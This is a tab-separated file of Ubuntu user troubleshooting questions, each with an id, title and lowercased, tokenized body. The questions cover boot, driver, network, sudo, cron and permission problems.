352704	why do disk names change at boot	previously , all of my disk partitions where called /dev/sda1 , /dev/sda2 , ... my network stopped working ( could n't ping out ) , and after a sudo ifdown eth0 and sudo ifup eth0 , my desktop went away and my computer froze ( ubuntu 12.10 , 32 bit - should have installed 64-bit , but too late to correct ) . after making a live boot cd , and mounting etc. , i have now found that all my partitions are labelled /dev/sde1 , /dev/sde2 ... i eventually got the system back through mounting the appropriate sdex 's on /mnt/dev , /mnt/sys , /mnt/proc , etc. , chroot , and update-grub , but i have no idea ( and have not been able find using google ) any info on why names changed . is anyone familiar with this ? thanks . -bi
352708	grub / boot manager , boot 2 wubi	i am in the process of setting up a wubi installation that i will store on my computers i use . but instead of booting to the wubi installation via the windows boot manager i want to be able to use a usb key to store a bootloader that then allows me to boot to the wubi stored on c : ( /dev/sda1 ) would i just install grub onto my memory stick and then add an entry to that to the wubi disk or some kind of windows boot manager ?
352709	how to stop `` floppy disk '' icon from appearing in 13.04 launcher ?	whenever i remove external hard drive or usb flash drive , a floppy disk icon appears in launcher . if i unlock it , it goes away but only until i use a usb device again . how to stop this ? btw i do n't have an actual floppy disk drive installed . however , in nautilus `` floppy disk '' is listed among devices . is this normal ?
352712	how to disable shutdown/restart/hibernate without authentication	i do not want to allow my desktop to shutdown/restart/hibernate without authentication . how can i achieve this ? i am running ubuntu 12.04 lts with unity . most of the questions previously asked involved asking the opposite thing . i need help as i am a newbie . thanks in advance .
352714	it is safe to include kate in the sudoers so it can run sudo without password ?	i want know if its as security problem when i add kate in sudoers without pw ? i think one must intercept my xserver session to make misuse of it . or am i wrong ?
352715	ubuntu 12.10 network lan issues	ok , so i recently started using linux ubuntu , and well iâve been trying to for about a week now to lan connect several computers at my house . but here 's the issue i keep running into , 2 of the 3 computers can see each other since they have samba , yet they can not see the third computer . and the third computer can not see them . all of the computers have samba , and are all on the same hub . i 've been trying to troubleshoot it , but it seems a little harder than windows to fix . the os i 've been running on the computers is 2 of them have ubuntu 12.10 and one has 12.04 . one of the 12.10 and the 12.04 can see each other but the other 12.10 can not see either one . can anybody help ?
352717	getting ia32-libs-gtk	i am testing ubuntu 13.04 arm on my android phone . i want to try using cisco packet tracer , i have installed it but it needs ia32-libs-gtk package to work . i tried to do sudo dpkg -- add-architecture i386 & & sudo apt-get update & & sudo apt-get install ia32-libs-gtk : i386 but still i ca n't get that package because `` e : unable to locate package ia32-libs-gtk '' . i am new at using ubuntu . i was `` googling '' about that problem like for half an hour but what i mostly saw is some old ( ~2011 ) topics not really helping . how can i install that package ?
352718	grub problem in 13.04	i have installed ubuntu 12.04 in lenovo g580 laptop . after installed successfully restarted my laptop . `` grub not found '' massage appeared when ever pressed power button . i reinstated again and installed `` grub '' by using `` '' so i realized something problem than removed `` f12 '' function key . now also same error massage appearing when ever i pressed power button . finally i deleted 12.04 version than installed 13.04. even now also same error massage appearing . now i am realizing the grub which i installed is making some problem . how can i remove this grub . my system windows 7 os also . previously both were working good . help me
352719	how do i turn off fingerprint authentication when docking my laptop ?	i have a thinkpad x230 and i 've turned on the fingerprint sensor : how to enable finger printer with thinkpad x230 however i got the thinkpad docking station and the integration with sudo and logging in is still enabled , which is annoying because the lid to my laptop is closed . is there a way to have the sensor integration turned off only when docked ? ideas and updates : i know i could turn it off in the bios but the feature is handy when i am not docked , so i was thinking that an ideal solution would be to make fprint toggle pam authentication depending on when i 'm docked or not .
352722	internet lan line-connection was reset	i have 12.04 lts running on my machine . since i have had ubuntu installed i have been unable to connect to the internet with my lan line . whenever firefox is opened the message appears , `` this connection was reset , the connection to the server was reset while the page was loading . '' this happens with any website i attempt to visit . when i run the command ifconfig the following appears : hatch @ hatch-mxc6300 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:30:64:0f : dd:7a inet addr:10.7.32.113 bcast:10.7.63.255 mask:255.255.224.0 inet6 addr : fe80 : :230:64ff : fe0f : dd7a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:20242 errors:0 dropped:0 overruns:0 frame:0 tx packets:3724 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1794017 ( 1.7 mb ) tx bytes:577696 ( 577.6 kb ) interrupt:20 memory : f7e00000-f7e20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:325 errors:0 dropped:0 overruns:0 frame:0 tx packets:325 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:28145 ( 28.1 kb ) tx bytes:28145 ( 28.1 kb ) also the firewall has been disabled . any help is much appreciated , -cat
352723	live dvd 's will not boot	i have a brand new hp envy 17-j020us core i7 w/win8 laptop that i can not boot on any live dvd . i , ve tried 12.04,12.10 and 13.04 . i 've tried secure boot off and on , legacy boot off and on . grub loads fine but the screen goes black after selecting `` try '' or `` install '' . dvd runs for several minutes but video never appears . i suspect a video problem on boot but it could be anything ? i have a rough idea how to edit boot options in grub but i dont know what those video options would be ? any help is greatly appreciated . edit : found another post similar that mentions option '' nomodeset '' , will try that when i get home tonight . other post however mention my intel hd4600 graphics being supported , so my initial thought of it being video related seems unlikely . edit : boot disks were turning screen brightness to zero ! this is known bug from what i 've read ? and its on all three versions ... 12.04-12.10-13.04 . now if i can figure out how to mark this solved/// hp envy 17-j020us
352724	i am trying to setup clonezilla with 2 network cards	i have one network card eth0 as 192.168.1.1 subnetmask as 255.255.255.0 and gateway as 192.168.1.1 i have eth1 as 192.168.20.1 subnetmask 255.255.255.0 and i have dhcp server setup on eth1 . my problem is i once it is setup i can use clonezilla fine then after a little while the internet stops working and i can not access clonezilla from a remote computer anymore . i do n't know if i am conflicting with the 2 nic cards or what . we do n't have a dhcp server here we are all static so i was gon na set the dhcp on ubuntu just for the clonezilla server . any help would be appreciated .
352725	python is taking up all of my cpu !	i noticed that my computer was running slowly , and that the cpu was at 80-99 % all the time , so i opened my task manager , and i see that python is taking up almost all of it . how do i fix this ?
352728	desktop files not visible with ati dual monitor setup	i have files and folders in my ~/desktop folder but they do not appear on my desktop . creating a new folder from the gui works and i can move the icon around but when i select `` organize desktop by name '' from the desktop context menu the icon 'disappears ' . these files are still in the folder and accessible by nautilus . i have installed gnome tweak and 'allowed the file manager to manage desktop ' . i have also checked my ~/home/.config/user-dirs.dirs file and nothing is amiss . after having looked for a solution , i know this is because of my dual monitor setup . how can i address this ? update my main desktop is landscape and my second monitor is portrait . the bottoms of the monitors are lined up . i discovered that the icons are hiding 'above ' my menu bar . if i move my main monitor up so that the tops of the two displays are aligned , the icons are visible . how can i tell unity where the top of my monitor/desktop starts ? ubuntu 12.04 fresh install not using radeon restricted drivers all updates current as of october 2nd , 2013 lenovo thinkcentre core i7 , 12gb ram
352732	mini.iso build up or break down from full os ?	i have an old portable computer that 's only used as a 'music server ' rhythmbox . it was slow with 11.10 , but i updated it to 12.04 anyhow . then , i eliminated a number of things with synaptic , leaving the computer with gnome ( necessary for rhythmbox ) and running xfce . lightdm does n't work anymore , so it 's 'gdm ' for me . the startup speed of the os has n't improved , and rhythmbox is still starting slowly . is there a method to really boost performance ? once rhythmbox is running , everything is fine , but it takes a long time to get there . i 've thought about doing a clean install from mini.iso , but i 'm not sure if that 's the recommended process and if i really will get any improvements . so , the question is if building up from mini.iso will result in a faster os . or should i prune things from the current setup to make it leaner ? what should i prune away ? if necessary , going to another music program is an option , but it has to be similar in simplicity for the user ( my wife ) . i have an acer travelmate 2420 , with 512mb ram and intel celeron m .
352735	byobu : `` can not exec new no such file or directory ''	i tried creating a new session in byobu : byobu new -s gateway then i see this message on bottom of screen : '' can not exec new no such file or directory '' and it returns this back to terminal : [ screen is terminating ] byobu appears to be up to date : $ sudo apt-get install byobu reading package lists ... done building dependency tree reading state information ... done byobu is already the newest version .
352737	lubuntu : how to add thunderbird as system startup application ?	here is what i tried : 1 ) i created a folder ~/.config/autostart 2 ) i have copied the thunderbird.desktop file from usr/share/applications to ~/.config/autostart 3 ) i have given it permissions to be able to be executed by anyone but it still wo n't start on startup . can you help ?
352738	ubuntu not booting as a result of choosing the third option in wubi	i am trying to install ubuntu 13.04 alongside windows.i have created a live-usb and in windows 7 , in wubi i choose the third option , that is helping me with ubuntu boot . when i restarted my pc , it gave me that , completing installation , press 'esc ' now for more boot options . and after installing complete ubuntu that option does n't seem to go away and when i choose to boot ubuntu in the boot menu , i again come to the live-session . i tried installing ubuntu again , this time the installer detects both the os.i reinstalled the os . but same problem . again in the live-session . edit : during both the installation , i removed the usb just after restarting.if it has something to do with , please let me know .
352747	how do i get involved in ubuntu ?	i recently graduated from a h.dip course in software development . i really want to get involved in some ubuntu desktop development projects . i 'm most competent in java and also have mysql knowledge . i also have a decent competency in web technologies such as html , css and javascript . it seems from what i have read so far that there 's myriad different ways and languages to program for ubuntu and i 'm just wondering considering my core skills what ye might recommend would be the best way to put the first foot forward ?
352750	wrong screen size listed	i 'm running ubuntu 12.04 on a dell studio 1555 . when i plug in my samsung hp-s4253 with hdmi , it has the tv listed as a 50 '' instead of 42 '' . thus , the desktop is displaying incorrectly . how can i fix this ?
352752	how to access drives that are mounted by other users ?	on my pc , i have three user accounts . suppose i open a drive from the file manager in one account , it gets mounted and can be accessed fine . but when i try to access the same drive from another account , it appears as already mounted , but trying to open it results in the following error : you do not have the permissions necessary to view the contents of âmy videosâ . i know that i can do sudo umount and then sudo mkdir sudo mount but , is there any permanent fix ?
352753	what are delta updates ?	what do they mean by delta updates on ubuntu touch ? i 've been using ubuntu for a few years now and it 's not a term i 'm familiar with .
352755	how can i make the pictures i synced stay in the cloud even if i delete them in my phone ?	i uploaded many pics from my iphone to the ubuntu one cloud . how can i make the pictures stay in the cloud even if i delete them in my phone ?
352759	usb drive does n't work after mounting ubuntu	my usb drive does n't even show up in the device manager so i ca n't even format it . its a lexar jumpdrive 64 gig . please how am i going to make it work again ?
352761	installation lock package	i 'm trying to install a package ( ccny_rgbd ) so i can run my ccny_rgbd_tools on ros , because i 've been having problems with the nodelets in this package and was suggested that i would install and compile the ccny_rgbd package . i used the command : sudo apt-get install ccny_rgbd and i get the following msg : its not possible to open file lock/var/lib/dpkg/lock - open ( 13 : permission denied ) why cant i install any packages ( ubuntu 12.10 ) ? ( i used sudo rm var/lib/dpkg/lock so i could remove the lock but it still locks every time )
352763	is there a way to attach a pygame window to glade window in quickly ?	i am trying to develop a game so that when i press a button which is created using glade window i should be able to run the pygame window i have succeeded so far but the pygame window opens separately and when i close that even the window developed using glade gets closed . can anyone propose a solution to my problem ? ?
352765	why does `` p '' in `` aptitude search '' mean not installed at all ?	$ sudo aptitude search node p nodejs - node.js event-based server-side javascript engine p nodejs : i386 - node.js event-based server-side javascript engine p nodejs-dbg - node.js event-based server-side javascript engine ( debug ) p nodejs-dbg : i386 - node.js event-based server-side javascript engine ( debug ) p nodejs-dev - development files for node.js p nodejs-dev : i386 - development files for node.js i know from man aptitude that : the first character of each line indicates the current state of the package : the most common states are p , meaning that no trace of the package exists on the system , c , meaning that the package was deleted but its configuration files remain on the system , i , meaning that the package is installed , and v , meaning that the package is virtual . i for `` installed '' , c for `` config '' , v for `` virtual '' . that all makes sense . why does p mean `` not installed at all , not even the configuration files '' ( note the lack of the letter `` p '' in that whole phrase ! ) ? i have to reread the man page every single time i see that p , because i always forget , and that really annoys me .
352769	erratic download speed ubuntu 13.04 64bit from usb wireless	after some research it looks like i need too turn off the power management for my usb device but i ca n't . whenever i run : sudo iwconfig wlan0 power off i get : error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; function not implemented . in windows i get 28-30mbps in ubuntu i hardly go above 300-400kbs .
352772	ubuntu 12.04 restarts automatically	i am running a program which takes several days at a stretch in my ubuntu 12.04 desktop . i find my pc restarted sometimes . there is no specific pattern to it . sometimes the first day or sometimes the third , etc . i am using 3 threads of my i-5 processor to run the program . i have 11 gb of ram and i am hardly using 4 gb ram thoughout the runtime of the program . i saw similar restarting issues in my pc restarts with no warning ! i am using ubuntu 12.04 where it says it could be temperature related . i plan to monitor the temperature of my processors next time i run the program , but it is unlikely that it is overheating in well air-conditioned room ( i could be wrong ! ) . is there a way to check the log files to say what caused the restart ? i am currently trying to tweak my program to create temporary restore points in the event of a system crash/restart . i would very much like to understand what is happening from the ubuntu side of things . any help would be great . thanks .
352773	installed cuda / bumblebee nvidia drivers now screen resolution stuck in laptop mode ( low ! ! ! )	i would appreciate any help ... . i 'm an ubuntu noob . i needed to use some gpu-based software that needs the cuda library to compile . so i installed it over and over again trying to make it work . eventually i installed bumblebee . the drives , kernel : everything was replaced . since a restart , the res has been stuck in laptop mode with a max of 1080x1024 . i 've tried re-installing the nvidia drivers , changing to alternate versions on my system , including the open source one and no luck ... i can not find xorg.xonf ... any help would be cherished ! any tips ?
352776	why does my cron job appear to do nothing ?	i wrote a groovy script to check a service and send email if it found a problem . it works fine from the command line . i 've struggled with getting it to work properly from cron . this is my current ( edited ) crontab : mailto=myid @ myhost.com bash_env= $ home/.bashrc 0,5,10,15,20,25,30,35,40,45,50,55 * * * * . $ home/.bashrc ; $ home/bin/monitordatasourcestatus.groovy > > $ home/mdss.out 2 > & 1 i do n't think the ubuntu cron uses the `` bash_env '' variable , but i saw that mentioned in other `` cron '' references , so i thought i 'd try it . the mailto is also likely ignored , as i do n't have an mta installed . i know the basic operation of cron is ok , because i get a syslog entry every five minutes as this specifies . the last one looks like this : oct 2 09:30:01 hostname cron [ 20268 ] : ( myid ) cmd ( . $ home/.bashrc ; $ home/bin/monitordatasourcestatus.groovy > > $ home/mdss.out 2 > & 1 ) oct 2 09:30:01 hostname cron [ 20267 ] : ( cron ) info ( no mta installed , discarding output ) oct 2 09:30:10 hostname crontab [ 20275 ] : ( myid ) list ( myid ) however , i can tell from expected side effects that it does n't seem like the script is executing . i 've enabled some print statements in the script , but the `` mdss.out '' file has n't been modified for several days now . i do n't know if it 's practical to install a mta . i assume that 's mail transfer agent .
352778	very slow svn checkouts unless i use -- no-auth-cache	using an up-to-date ubuntu precise 64-bit , checking out a large code base svn co https : // ... . takes hours . using cygwin or tortoise it takes 5 minutes . after poking around , i found this post which did n't work , but led me to try ; svn co -- no-auth-cache https : // ... . and the checkout took only the 5 minutes . so , i have a workaround , but am left wondering if there is something inherently wrong with the ubuntu installation ?
352786	unable to change grub2 boot loader image	i have tried the method mentioned in this link below https : //help.ubuntu.com/community/grub2/displays but i am unable to change the boot loader image . i was able to change it once , but when i tried to update again with a new image , it restored to default and since then i am not able to update to use any new image . kindly help . thanks ! ! !
352787	installing ubuntu on a 640gb drive beside windows	i want to install ubuntu 13.04 beside windows 7 that 's using a 640gb hdd in my laptop , and every time i go ahead an use the 'install ubuntu alongside windows ' ( i do n't want to use any partitioning tools ) it will only let me allocate up to only 42gb . i am guessing ubuntu is using that divider thing when you drag it across , can i get it lower to like 10gb , cause that is all i need for ubuntu . ( ive been using ubuntu on an off usb for quite some time cause the installation wont let me go less then 42 ... it just says 42 ) . bit more info if needed : toshiba l650 64bit 2.53 i5 8gb ram 640gb hdd with 188gb of free space my laptop does n't seem to like ubuntu 12.04 running on it for some weird reason ( it lags running it ) , but love 13.04 running on it via usb , it does n't lag at all all an yes i am using the 64bit editions as well not 32 .
352788	dell latitude e6510 blank screen	how do i fix this problem on my laptop which works perfectly when connected to external monitor . if i also abandon it without use for one or two days the lcd will come on but will still go black after sometime or when i restart the system or when it sleeps or hibernates . i will appreciates useful contributions
352793	samsung ativ book 9 lite	i 'm thinking of replacing win 8 with ubuntu and i have booted from a flash drive , as well as trying from a dvd drive , selecting the try option instead of install . i get the ubuntu loading screen however , from this i get a command prompt style environment , this does not happen with my desktop . help please ! thanks .
352795	replace wireless driver with modprobe	this question , like many others here , regards the rt2800pci driver with a realtek 539a adapter on the hp probokk 4540 ( related bug here ) . i have followed the steps on many other posts , such as the solution in the last post here : wifi keeps disconnecting and extremely slow at low signal - ubuntu 13.04 i am using ubuntu 13.10 with the 3.11-1 kernel . i compiled the mediatek driver ( with patch ) as prescribed , and all went well . the problem came in the last part , where i am supposed to add the new rt5390sta module to my modules list . sudo modprobe rt5390sta lsmod this executes , and i see the module loaded . i have also blacklisted the old rt2800 modules as the solution prescribes . however , wlan0 refuses to come back up . if i can get this to work , it will save 60-some student and teacher laptops a very troublesome adapter replacement .
352799	hw requirements for 13.04/13.10	i 'm sorry if this has been asked and addressed already . what are the hw pre requisites for ubuntu 13.04/13.10 ? i 'm a big fan of ubuntu and wish to install it on my 9 year old pc . wondering if it will work .
352801	after fglrx driver install : `` setting of real/effective user id to 0/0 failed ''	after completing the fglrx driver install from the current 13.8 drivers ( i was advised to do this because the drivers in additional drivers do not work at all ) , when i reboot , i come to a black screen that seems to last about 10 seconds , followed by a desktop where unity is invisible . if i click in the locations where icons would be , the applictions open successfully , but the whole thing is invisible . additionally , if i run fglrxinfo , i get this series of errors : setting of real/effective user id to 0/0 failed libgl error : open uki failed ( operation not permitted ) libgl error : reverting to ( slow ) indirect rendering direct rendering : no ( if you want to find out why , try setting libgl_debug=verbose ) opengl renderer string : amd radeon hd 7670m if i try running glxgears , i get extreme lag.. i was able to temporarily get glxgears running at normal speed and resolve the `` setting of real/effective user id to 0/0 failed '' by using this command : sudo chmod -r 777 /proc/ati/ however , this solution only works until i reboot ( and does n't make unity visible ) . after reboot the problem is back , and unity is still invisible .
352806	how to return to a previous bullet point type after pressing tab to nest bullet points	so i 'm writing in libreoffice ( version 4.0.2.2 ) and i start a bulleted list like so : list item 1 list item 2 list item 3 but i notice i want a sub list nested in list item 3 , so i press return and then tab and carry on , like so : list item 1 list item 2 list item 3 list item 3.1 list item 3.2 list item 3.3 and then i am done with my nested list and want to continue my list , how do i do this ? list item 1 list item 2 list item 3 list item 3.1 list item 3.2 list item 3.3 list item 4 list item 5
352807	adobe flash ubuntu 12.04 lts	ubuntu 12.04 lts . flash videos played then stopped playing about a year ago . how can i check to see what crashes and what needs to be removed and reinstalled ?
352809	wnda3100 wireless adapter has stopped working under ubuntu 12.04	i had got my usb wireless adapter working using the ndiswrapper approach , but since a batch of updates it has stopped working . it no longer lights up and no longer connects to the network i had it configured to use the version of ubuntu i am using is : distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise and the output of lsusb is : bus 001 device 002 : id 0bc2:2332 seagate rss llc bus 001 device 005 : id 0bda:0111 realtek semiconductor corp. card reader bus 001 device 009 : id 0846:9011 netgear , inc. wnda3100v2 802.11abgn [ broadcom bcm4323 ] bus 003 device 002 : id 046d : c52e logitech , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub i 'm fairly new to linux , so any general advice on how i can get it working again would be brilliant .
352815	what is the difference between installing ubuntu on a usb device and a laptop hardisk ?	now , i have a laptop with windows 8 . for various reasons , i want to install ubuntu that i can carry with me on the various pcs i work with . the same installation so that i do n't have to constantly take care of installing new things and dependencies . can i do a full installation of ubuntu in a usb ? can i install softwares and other things in the usb itself so that i can boot it anywhere i want ? what is the difference of this installation from full installation on a laptop harddisk ? what features will and will not work with the usb option ? thanks !
352827	alcatel onetouch x085c is not found by ubuntu 12.04	hope somebody can help me . i have done everything in other threads to get my modem detected to no avail . i upgraded to ubuntu 12.04 hoping that will solve the problem , no joy . here is the description : the modem works in windows , no problem the laptop is an ibm x41 tablet when i insert the modem into the usb port , nothing happens ( no cd-rom icon is created on the sidebar ) here are the results of lsusb root @ chile : /home/chile # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 1bbb:0012 t & a mobile phones bus 004 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader the device is recognized as : bus 003 device 002 : id 1bbb:0012 t & a mobile phones and this is where it stops . i can not get it to work by running the following : sudo modpropbe usbserial vendor=0x1bbb product=0x0012 here are the results of cat /sys/kernel/debug/usb/devices t : bus=03 lev=01 prnt=01 port=01 cnt=01 dev # = 2 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1bbb prodid=0012 rev= 0.00 s : manufacturer=data interface s : product=data interface s : serialnumber=ÿÿÿÿÿÿÿÿÿÿÿÿÿ c : * # ifs= 5 cfg # = 1 atr=a0 mxpwr=500ma i : * if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver= ( none ) e : ad=81 ( i ) atr=03 ( int . ) mxps= 16 ivl=128ms e : ad=82 ( i ) atr=02 ( bulk ) mxps= 64 ivl=0ms e : ad=02 ( o ) atr=02 ( bulk ) mxps= 64 ivl=0ms i : * if # = 1 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver= ( none ) e : ad=84 ( i ) atr=02 ( bulk ) mxps= 64 ivl=0ms e : ad=04 ( o ) atr=02 ( bulk ) mxps= 64 ivl=0ms i : * if # = 2 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver= ( none ) e : ad=87 ( i ) atr=02 ( bulk ) mxps= 64 ivl=0ms e : ad=07 ( o ) atr=02 ( bulk ) mxps= 64 ivl=0ms i : * if # = 3 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver= ( none ) e : ad=86 ( i ) atr=02 ( bulk ) mxps= 64 ivl=0ms e : ad=06 ( o ) atr=02 ( bulk ) mxps= 64 ivl=0ms i : * if # = 4 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) e : ad=85 ( i ) atr=02 ( bulk ) mxps= 64 ivl=0ms e : ad=0a ( o ) atr=02 ( bulk ) mxps= 64 ivl=0ms i used every advice given in other threads and nothing helped so far . please let me know what info you might need . thank you .
352832	find files where the filename is only different by case	i need to get a list of all the files that only differ in case . i.e. , if i have a folder ( with sub-folders ) with the files : one.txt one.txt two.txt three.txt three.txt four.txt five/5.txt five/6.txt five/6.txt i want some bash magic that will spit out : one.txt one.txt three.txt three.txt five/6.txt five/6.txt
352834	how to make pulse audio recognize the external micro headset ?	pulse audio does not recognize the external micro ( headset ) , although audicity ( through alsa ) recognizes and works with it . as a cosequence , skype ( from the canonical ) does not recognize the micro either . what to do ?
352836	how can i tell linux kernel to completely ignore a disk as if it was not even connected ?	notice please scroll down for the answer ( it has 0 points but it is the correct one ) . the problem is solved by a patch that will be in kernel 3.12.7 and up ; i hope it will back-ported to earlier ones , too . my laptop is a samsung chronos serie s 7 . ubuntu gnome remix 13.04 , with intel updated drivers . i have a problem with the internal ssd drive ( 8g capacity ) . it fails with comreset and input/output errors . i am quite convinced that the problem is hardware ; unfortunately i do not have windows installed in the laptop to check if it 's a matter of ssd configuration or whatever . the problem is that the disk is recognized by udev : kernel [ 9.515930 ] add /devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sdb ( block ) action=add devname=sdb devpath=/devices/pci0000:00/0000:00:1f.2/ata2/host1/target1:0:0/1:0:0:0/block/sdb devtype=disk major=8 minor=16 seqnum=1785 subsystem=block udev_log=3 and after that it fails in a lot of checks , delaying boot , delaying shutdown , and making ( i think ) suspend impossible . is it possible to tell linux to completely ignore anything on the ata2 link ? i tried adding this line to /etc/udev/rules.d/10-local.rules subsystems== '' pci '' drivers== '' ahci '' kernels== '' ata2 '' options== '' ignore_device '' but it does n't work . on the other hand , if anyone knows how to reset the ssd if it was left in `` cache '' mode without using windows ... or to boot a `` live '' windows to do the same ... thanks ! data added : full udevadm info -a -n /dev/sdb pasted to http : //paste.ubuntu.com/6186145/ smartctl -i /dev/sdb -t permissive gives : root @ samsung-romano : /home/romano # smartctl -i /dev/sdb -t permissive smartctl 5.43 2012-06-30 r3573 [ x86_64-linux-3.8.0-31-generic ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net vendor : /1:0:0:0 product : user capacity : 600,332,565,813,390,450 bytes [ 600 pb ] logical block size : 774843950 bytes > > terminate command early due to bad response to iec mode page which is clearly wrong . nevertheless : root @ samsung-romano : /home/romano # fdisk -b 512 -c 970 -h 256 -s 63 /dev/sdb fdisk : unable to read /dev/sdb : input/output error ( ssd data from http : //ubuntuforums.org/showthread.php ? t=1935699 & p=11739579 # post11739579 ) . additional thought : could all this being a side effect of the intel smart response technology not being disabled before installing linux ? if yes , how can i check it short of reinstalling a windows on the machine ? or this is a shot in the dark ? ( in the bios the ssd drive does n't show and there is nothing about intel srt ) . about marking as duplicate : i changed the title of the question ; i do not think that the linked question answers my problem . i positively know that the ssd is failing . i am asking if it 's possible to tell the linux kernel to not probe for it at all .
352838	wifi connection problem with atheros ar9485 problem	i 'm currently working in 13.04 . the network manager indicates that the wifi is always connected . however , the internet connection only last a few seconds and then it disconnects . the problem only exist when i want to connect to a wpa2-enterprise protected network . there is not problem if i connect another unprotected network . i have tried the nohwcrypt=1 method , but it does not help . what can be the problem ? let me know if you need any further information . thanks
352839	accidentaly deleted ubuntu system partion during attempted windows install	during a foolish attempt at installing windows 7 along side ubuntu 12.10 on a separate drive , for some lab work , i accidentally deleted ( not formatted ) the wrong disk and immediately after realizing what i had done stopped the install . so now nothing is installed and i am left with `` grub rescue > '' . i know my files are still there , how do i go about putting everything back in its place ? would it be easier to continue with my plans to install windows 7 on the right disk and recover the partitions from there ? or recover my ubuntu 12.10 system first and then attempt the windows 7 install after with more caution .
352846	grant users access to directories on partition	i have just installed ubuntu 13.04 . the os and binaries are on an ssd . all of the data and files are on a standard hdd . the system 's other user accounts each have a directory on the hdd . unfortunately , i do n't know how to grant users access to their partitions . i have created symbolic links from their home directories , on the ssd , to their directories on the hdd . however , the permissions must be messed up since they ca n't see the contents of their directories . i did try to use chown to set the permissions . so for a user named john i did the following to their data directory ( on the hdd ) : sudo chown john : john -r /media/myusername/hdd/john this does n't grant them access , unfortunately . should i be mounting the hdd to /media/ instead of its automount location , which is /media/myusername ? to be clear , i want users to have access to their own directories on the hdd , but not anyone else 's . otherwise , i would just change the entire disk 's permissions to 777 . thanks .
352848	upstart and process substitution	so i want to use the following in my script stanza : forever -l > ( tee $ qw_log_dir/webserver.log | logger -p user.info -t ' [ qw ] ' ) start webserver.js however , that wo n't work because : that 's bash syntax , and : the > ( ... ) construct creates a process before my actually creating forever , so upstart will track the wrong pid . ... at least that 's what i think , i 'm an upstart newbie . my thinking is that in order to bypass both of these issues , i should use mkfifo in my pre-start stanza so that i can write to the fifo in my start script . questions : is that the way to go ? if not -- what is ? if it is , then i will need to run the ( tee | logger ) part `` in the background '' , presumably in pre-start ? again , if so , how do i track it , and take it down in my post-end stanza ?
352852	configuring postfix with multiple virtualhosts	i am trying to set up postfix for a website i am hosting , but the machine is hosting multiple sites . drupal and wordpress sites ( which might be important , i 'm not sure ) . i am testing it out by running some sendmail commands and it is actually sending me the mail . the domain ( @ whatever.com ) is what i specified in the config process . is there a way to have the domain change depending on what virtualhost ( site ) is sending the mail ? so if myweb.org send mail it comes from @ myweb.org .
352854	`sudo userx` returns `sudo : userx : command not found` , why ?	just installed this linux disto ver 13.04 installed xfce 4.0x got it running just fine then for some reason that good'o sudo stopped working all by itself why ? i now type in sudo and this is what i get wed oct 2 15:23:06 cdt 2013 [ 15:23 userx @ bw ~ ] > sudo usage : sudo [ -d level ] -h | -k | -k | -v usage : sudo -v [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] usage : sudo -l [ l ] [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name ] [ -u user name| # uid ] [ -g groupname| # gid ] [ command ] usage : sudo [ -abehknps ] [ -r role ] [ -t type ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] [ -g groupname| # gid ] [ var=value ] [ -i|-s ] [ < command > ] usage : sudo -e [ -akns ] [ -r role ] [ -t type ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] file ... so i then type in this [ 15:23 userx @ bw ~ ] > sudo userx [ sudo ] password for userx : sudo : userx : command not found [ 15:23 userx @ bw ~ ] > and that is what i get after i type in my password what is going on here ? how am i to install anything ? wish they 'd never messed with su installed the root user account by default then let you create users
352860	installing ubuntu gives black and white screen	when i try to install ubuntu from usb , it works fine untill i get a black and white screen . it appears right after the purple start up screen with `` ubuntu '' in the middle . i downloaded the .iso file from ubuntu.com . then i made the an installer usb using 'universal usb installer ' . is my file corrupt or what is wrong ? i tried it different times .
352864	apt-get update not working ( not found [ ip : 91.189.92.201 80 ] )	when i try to run apt-get update i get the following error messages : i am using : distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/natty-security/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.201 80 ] e : some index files failed to download . they have been ignored , or old ones used i have tried few solutions : like choose the best server from ubuntu software section : it was never able to select the best server as it gave error ( check your internet connection . ) my internet is working fine and i am able to browse . sudo sed -i -e 's/archive.ubuntu.com\|security.ubuntu.com/old-releases.ubuntu.com/g ' /etc/apt/sources.list sudo dpkg -- configure -a nothing worked . i am not able to post the full error message as its not letting me post more than two links .
